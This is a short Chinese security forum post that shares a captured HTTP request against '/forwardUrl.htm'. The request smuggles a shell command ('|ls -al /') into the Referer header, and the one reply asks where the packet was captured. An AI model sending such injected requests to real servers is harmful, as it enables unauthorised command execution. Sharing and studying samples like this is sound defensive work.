命令执行一则

GET /forwardUrl.htm HTTP/1.1
Content-Length: 0
Referer: dasdasdasd|ls -al /
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Cookie: TY_SESSION_ID=e000c4ed-10c8-43f0-8262-eea285bdbb76;randomToken=24664601;PHPSESSID=uq0kne082sgoog5mov3qmrr6l
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip,deflate
Host: XXX

1 个评论

这个包看到是在Referer有命令注入的,请问这是哪个环境下捕获的?

要回复文章请先登录注册